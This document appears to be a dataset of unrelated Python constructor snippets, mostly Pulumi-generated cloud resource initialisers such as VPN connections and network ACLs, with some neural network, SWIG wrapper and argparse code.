"def __init__(self, layerNeurons, initialWeights = None, layerTypes=None, **kwargs):\r\n \r\n # Ensure that there is at-least one input and one output layer in the network\r\n assert len(layerNeurons)>1, \"At least one input layer and one output layer is needed\"\r\n \r\n # Get the total number of weights needed in the network\r\n totalWeightCount = NeuralNetwork.getSizeOfWeightVector(layerNeurons)\r\n \r\n # Initialise the weights with the initializer or random values\r\n if initialWeights is None:\r\n self.weights = np.random.uniform(-1/np.sqrt(layerNeurons[0]), 1/np.sqrt(layerNeurons[0]), totalWeightCount)\r\n else:\r\n assert len(initialWeights) == totalWeightCount, (\"Length of initial weight matrix incorrect. You need \"+str(totalWeightCount)+\" weights\")\r\n self.weights = np.array(initialWeights, dtype = np.float64) \r\n \r\n # create an empty array of layers\r\n self.layers = []\r\n layerBlockStart = 0\r\n \r\n if layerTypes is None or len(layerTypes)<(len(layerNeurons)-1):\r\n layerTypes=[NetworkLayer]*(len(layerNeurons)-1)\r\n \r\n for layerInputDimention, layerOutputDimention, layerType in zip(layerNeurons, layerNeurons[1:], layerTypes):\r\n # initialise each layer with its input and output dimentions and bi-directional pointers to the relivant weights\r\n layerBlockEnd = layerBlockStart+(layerInputDimention*layerOutputDimention)\r\n layerBiasEnd = layerBlockEnd+layerOutputDimention\r\n newLayer = layerType(layerInputDimention, layerOutputDimention, \r\n self.weights[..., layerBlockStart:layerBlockEnd], \r\n self.weights[..., layerBlockEnd:layerBiasEnd], **kwargs)\r\n self.layers.append(newLayer)\r\n \r\n layerBlockStart = layerBiasEnd\r\n \r\n # Tell the output later to use a different function to calculate the delta \r\n newLayer.calcDelta = newLayer.calcDeltaOutputLayer",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n network_connection: Optional[pulumi.Input[str]] = None,\n network_excludes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n network_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n password_change: Optional[pulumi.Input[str]] = None,\n password_reset: Optional[pulumi.Input[str]] = None,\n password_unlock: Optional[pulumi.Input[str]] = None,\n policy_id: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n status: Optional[pulumi.Input[str]] = None,\n users_excludeds: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n destination_region_id: Optional[pulumi.Input[str]] = None,\n destination_zone_id: Optional[pulumi.Input[str]] = None,\n group_name: Optional[pulumi.Input[str]] = None,\n rpo: Optional[pulumi.Input[int]] = None,\n source_region_id: Optional[pulumi.Input[str]] = None,\n source_zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, *args):\n _snap.TModeNet_swiginit(self, _snap.new_TModeNet(*args))",
"def generateArgsList(self, I1, I2, O1, O2, O3, N, M, S, C ):\n ArgsList = [ \n \"-n\", str(N), \n # \"-m\", str(M), \n # \"-s\", str(S), \n \"-c\", str(C), \n ]\n if I1 > 0 or I2 > 0:\n if I1 > 0:\n ArgsList.append(\"-i1\")\n ArgsList.append(str(I1)) \n if I2 > 0:\n ArgsList.append(\"-i2\")\n ArgsList.append(str(I2))\n else: \n ArgsList.append(\"--noinput\")\n \n if O1 > 0 or O2 > 0 or O3 > 0:\n if O1 > 0:\n ArgsList.append(\"-o1\")\n ArgsList.append(str(O1)) \n if O2 > 0:\n ArgsList.append(\"-o2\")\n ArgsList.append(str(O2))\n if O3 > 0:\n ArgsList.append(\"-o3\")\n ArgsList.append(str(O3))\n else: \n ArgsList.append(\"--nooutput\")\n \n ArgsList.append(\"--nosummary\")\n ArgsList.append(\"--verbose\")\n return ArgsList",
"def __init__(self, *args, **keywords):\n attribs = keywords if (len(args) <= 0) else list(args).pop()\n Entity.__init__(self, attribs)",
"def __init__(__self__, *,\n acl_id: pulumi.Input[str],\n dest_cidr: pulumi.Input[str],\n dest_port_range: pulumi.Input[str],\n direction: pulumi.Input[str],\n ip_protocol: pulumi.Input[str],\n policy: pulumi.Input[str],\n source_cidr: pulumi.Input[str],\n source_port_range: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None):\n pulumi.set(__self__, \"acl_id\", acl_id)\n pulumi.set(__self__, \"dest_cidr\", dest_cidr)\n pulumi.set(__self__, \"dest_port_range\", dest_port_range)\n pulumi.set(__self__, \"direction\", direction)\n pulumi.set(__self__, \"ip_protocol\", ip_protocol)\n pulumi.set(__self__, \"policy\", policy)\n pulumi.set(__self__, \"source_cidr\", source_cidr)\n pulumi.set(__self__, \"source_port_range\", source_port_range)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)",
"def __init__(self, *args):\n this = _elas.new_Elas_parameters(*args)\n try:\n self.this.append(this)\n except Exception:\n self.this = this",
"def lease_create_args(name=None, start='now', length=None, end=None,\n nodes=1, resource_properties=''):\n if name is None:\n name = 'lease-{}'.format(random_base32(6))\n\n if start == 'now':\n start = datetime.datetime.now(tz=tz.tzutc()) + datetime.timedelta(seconds=70)\n\n if length is None and end is None:\n length = DEFAULT_LEASE_LENGTH\n elif length is not None and end is not None:\n raise ValueError(\"provide either 'length' or 'end', not both\")\n\n if end is None:\n if isinstance(length, numbers.Number):\n length = datetime.timedelta(seconds=length)\n end = start + length\n\n if resource_properties:\n resource_properties = json.dumps(resource_properties)\n\n reservations = [{\n 'resource_type': 'physical:host',\n 'resource_properties': resource_properties,\n 'hypervisor_properties': '',\n 'min': str(nodes), 'max': str(nodes),\n }]\n\n query = {\n 'name': name,\n 'start': start.strftime(BLAZAR_TIME_FORMAT),\n 'end': end.strftime(BLAZAR_TIME_FORMAT),\n 'reservations': reservations,\n 'events': [],\n }\n return query",
"def __init__(self, **kwargs):\n super(VRPCluster, self).__init__(**kwargs)\n if self.subclusters is None:\n if \"demand\" in kwargs:\n self.demand = kwargs.get(\"demand\")\n else:\n raise AttributeError(\"Two cluster or index and demand must be given as arguments for VRPCluster\")\n else:\n self.demand = self.subclusters[0].demand + self.subclusters[1].demand\n\n def __repr__(self):\n return \"VRPCluster: {}, {}\".format(self.cluster_indices, self.demand)",
"def __init__(__self__, *,\n group: Optional[pulumi.Input[str]] = None,\n last_generation: Optional[pulumi.Input[int]] = None,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None,\n resource: Optional[pulumi.Input[str]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if group is not None:\n pulumi.set(__self__, \"group\", group)\n if last_generation is not None:\n pulumi.set(__self__, \"last_generation\", last_generation)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)\n if resource is not None:\n pulumi.set(__self__, \"resource\", resource)\n if version is not None:\n pulumi.set(__self__, \"version\", version)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n address1: Optional[pulumi.Input[str]] = None,\n address2: Optional[pulumi.Input[str]] = None,\n billing_contact_user: Optional[pulumi.Input[str]] = None,\n city: Optional[pulumi.Input[str]] = None,\n company_name: Optional[pulumi.Input[str]] = None,\n country: Optional[pulumi.Input[str]] = None,\n end_user_support_help_url: Optional[pulumi.Input[str]] = None,\n logo: Optional[pulumi.Input[str]] = None,\n opt_out_communication_emails: Optional[pulumi.Input[bool]] = None,\n phone_number: Optional[pulumi.Input[str]] = None,\n postal_code: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None,\n support_phone_number: Optional[pulumi.Input[str]] = None,\n technical_contact_user: Optional[pulumi.Input[str]] = None,\n website: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, arg_list):\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\n \"catalogs\",\n nargs=\"+\",\n help=\"Path to input catalog(s)\"\n )\n\n parser.add_argument(\n \"-a\", \"--aggregate\",\n dest=\"aggregate\",\n action=\"store_true\",\n help=\"Produce NcML aggregations and add OPeNDAP endpoints\"\n )\n parser.add_argument(\n \"-w\", \"--wms\",\n dest=\"wms\",\n action=\"store_true\",\n help=\"Add WMS and WCS endpoint for aggregations\"\n )\n parser.add_argument(\n \"-o\", \"--output-dir\",\n dest=\"output_dir\",\n default=\"output_catalogs\",\n help=\"Directory to write modified catalog(s) to [default: %(default)s]\"\n )\n parser.add_argument(\n \"-n\", \"--ncml-dir\",\n dest=\"ncml_dir\",\n default=\"aggregations\",\n help=\"Directory to write NcML aggregations to if using --aggregate \"\n \"[default: %(default)s]\"\n )\n parser.add_argument(\n \"-s\", \"--server\",\n dest=\"thredds_server\",\n default=\"cci-odp-data.ceda.ac.uk\",\n help=\"The hostname of the THREDDS server on which the data will \"\n \"hosted. This is required to construct URLs to THREDDS \"\n \"catalogs in global attributes in aggregations \"\n \"[default: %(default)s]\"\n )\n parser.add_argument(\n \"--remote-agg-dir\",\n default=\"/usr/local/aggregations/\",\n help=\"Directory under which NcML aggregations are stored on the \"\n \"THREDDS server [default: %(default)s]\"\n )\n parser.add_argument(\n \"--data-dir\",\n dest=\"data_dir\",\n default=\"/neodc/esacci\",\n help=\"Directory under which data is stored, so that the THREDDS \"\n \"dataset root can be translated to give the real path on \"\n \"disk [default: %(default)s]\"\n )\n\n self.args = parser.parse_args(arg_list)\n\n if self.args.wms and not self.args.aggregate:\n parser.error(\"Cannot add WMS/WCS aggregations without --aggregate\")",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n additional_egress_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EgressEndpointArgs']]]]] = None,\n cloud_services_network_name: Optional[pulumi.Input[str]] = None,\n enable_default_egress_endpoints: Optional[pulumi.Input[Union[str, 'CloudServicesNetworkEnableDefaultEgressEndpoints']]] = None,\n extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: Optional[DomainArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: Optional[ServerArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(self, D_in, H1, H2,H3, D_out):\n super(ThreeLayerNet, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H1)\n self.linear2 = torch.nn.Linear(H1, H2)\n self.linear3 = torch.nn.Linear(H2, H3)\n self.linear4 = torch.nn.Linear(H3, D_out)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FileShareConfigArgs']]]]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkConfigArgs']]]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None,\n __props__=None):\n ...",
"def __init__(self, **kwargs):\n #super(Net, self).__init__()\n nn.Module.__init__(self)\n # Build CNN\n module, shapes, optim = build_neuron_network(**kwargs)\n self._configuration = kwargs\n self.add_module('cnn', module)\n self.shapes = shapes\n # Loss and optimization\n self.criterion = nn.MSELoss(reduction='mean')\n self.optimizer = optim\n self._kwargs = kwargs",
"def __init__(self, openfile=None, license=None, *args, **kwargs):\n # Environment pointer. First arg is license.\n # (const char* license, environ_ns* env, const char* locn)\n cnetica.NewNeticaEnviron_ns.argtypes = [c_char_p, c_void_p, c_char_p]\n cnetica.NewNeticaEnviron_ns.restype = c_void_p\n self.env = cnetica.NewNeticaEnviron_ns(ccharp(license), None, None)\n # Most applications have only one environment, but we keep\n # this environment specific to the object instance.\n\n # Initialize environment.\n mesg = create_string_buffer(MESGLEN)\n # (environ_ns* env, char* mesg)\n cnetica.InitNetica2_bn.argtypes = [c_void_p, c_char_p]\n cnetica.InitNetica2_bn.restype = c_int\n self.res = cnetica.InitNetica2_bn(self.env, mesg)\n logger.info(mesg.value)\n\n # Create net.\n if openfile:\n # Read net from file.\n file_p = self._newstream(openfile) # Create stream.\n # Net pointer.\n # (stream_ns* file, int options)\n cnetica.ReadNet_bn.argtypes = [c_void_p, c_int]\n cnetica.ReadNet_bn.restype = c_void_p\n self.net = cnetica.ReadNet_bn(file_p, REGULAR_WINDOW)\n else:\n # Create new empty net.\n # TODO: Figure out significance of name arg.\n # (const char* name, environ_ns* env)\n cnetica.NewNet_bn.argtypes = [c_char_p, c_void_p]\n cnetica.NewNet_bn.restype = c_void_p\n self.net = cnetica.NewNet_bn(ccharp('BayesNet'), self.env)\n self.setautoupdate() # Auto update on by default.",
"def __init__(self,model:nn.Module,dataloader,func_loss,optimizer,scheduler,*,taskstr,taskstr_short,n_max_epoch,n_sample_per_epoch):\n self.model= model\n self.dataloader = dataloader\n self.func_loss = func_loss\n self.optimizer = optimizer\n self.scheduler = scheduler\n\n self.n_max_epoch = n_max_epoch\n self.n_sample_per_epoch = n_sample_per_epoch\n self.taskstr = taskstr\n self.taskstr_short = taskstr_short",
"def __init__(__self__,\n resource_name: str,\n args: Optional[TransferConfigArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(self, a, b, c):\r\n self.a = a\r\n self.b = b\r\n self.c = c",
"def __init__(self, *args):\n this = _libsbml.new_ListOfLocalParameters(*args)\n try: self.this.append(this)\n except: self.this = this",
"def __init__(self,\r\n name=None,\r\n lan_ip=None,\r\n uplink=None,\r\n public_port=None,\r\n local_port=None,\r\n allowed_ips=None,\r\n protocol=None):\r\n\r\n # Initialize members of the class\r\n self.name = name\r\n self.lan_ip = lan_ip\r\n self.uplink = uplink\r\n self.public_port = public_port\r\n self.local_port = local_port\r\n self.allowed_ips = allowed_ips\r\n self.protocol = protocol",
"def __init__(self, *args, **kwargs):\n self._args = args\n self._kwargs = kwargs",
"def __init__(__self__, *,\n address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n subnet_prefix_length: Optional[pulumi.Input[int]] = None):\n if address is not None:\n pulumi.set(__self__, \"address\", address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if subnet_prefix_length is not None:\n pulumi.set(__self__, \"subnet_prefix_length\", subnet_prefix_length)",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
